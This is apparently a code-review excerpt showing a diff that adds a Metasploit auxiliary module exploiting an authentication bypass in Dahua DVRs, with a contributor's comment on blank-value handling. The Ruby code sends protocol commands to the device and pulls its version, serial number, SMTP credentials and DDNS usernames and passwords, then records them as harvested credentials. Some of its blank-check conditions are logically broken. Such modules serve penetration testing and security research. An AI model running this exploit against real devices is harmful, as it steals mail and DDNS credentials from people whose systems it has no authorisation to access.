modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb

```diff
@@ -0,0 +1,376 @@
+                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+
+  def setup
+    @password = datastore['PASSWORD']
+    @password ||= Rex::Text.rand_text_alpha(6)
+  end
+
+  def grab_version
+    connect
+    sock.put(VERSION)
+    data = sock.get(1024)
+    if data =~ /[\x00]{8,}([[:print:]]+)/
+      ver = Regexp.last_match[1]
+      print_status("Version: #{ver} @ #{rhost}:#{rport}!")
+    end
+  end
+
+  def grab_sn
+    sock.put(SN)
+    data = sock.get(1024)
+    if data =~ /[\x00]{8,}([[:print:]]+)/
+      serial = Regexp.last_match[1]
+      print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!")
+    end
+  end
+
+  def grab_email
+    connect
+    sock.put(EMAIL)
+    if data = sock.get(1024).split('&&')
+      print_status("Email Settings: @ #{rhost}:#{rport}!")
+      if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/
+        if mailhost = Regexp.last_match[1].split(':')
+          print_status("  Server: #{mailhost[0]}") unless mailhost[0].nil?
+          print_status("  Destination Email: #{data[1]}") unless mailhost[1].nil?
+        end
+          if !data[5].nil? && !data[6].nil?
+            print_good("  SMTP User: #{data[5]}") unless data[5].nil?
+            print_good("  SMTP Password: #{data[6]}") unless data[6].nil?
+            muser = "#{data[5]}"
+            mpass = "#{data[6]}"
+            mailserver = "#{mailhost[0]}"
+            print_good("MailServer: #{mailserver}")
+            if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0
+              report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil?
+            end
+          end
+      end
+    end
+  end
+
+  def grab_ddns
+    connect
+    sock.put(DDNS)
+    if data = sock.get(1024)
+      data = data.split(/&&[0-1]&&/)
+      data.each_with_index do |val, index|
+        if index > 0
+          val = val.split("&&")
+          ddns_service = "#{val[0]}"
+          ddns_server = "#{val[1]}"
+          ddns_port = "#{val[2]}"
+          ddns_domain = "#{val[3]}"
+          ddns_user = "#{val[4]}"
+          ddns_pass = "#{val[5]}"
+          print_status("DDNS Settings @ #{rhost}:#{rport}!:")
+          print_status("  DDNS Service: #{ddns_service}") unless val.nil?
+          print_status("  DDNS Server:  #{ddns_server}") unless val.nil?
+          print_status("  DDNS Port: #{ddns_port}") unless val.nil?
+          print_status("  Domain: #{ddns_domain}") unless val.nil?
+          print_good("  Username: #{ddns_user}") unless val.nil?
+          print_good("  Password: #{ddns_pass}") unless val.nil?
+          if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0
```

Comment:
The stripping was done there in case it is blank so that it only reports if it has data. I noticed that it was failing on the report func if it had  null value to input. Im still new to this, so I don't have a better way to only report the info if its not blank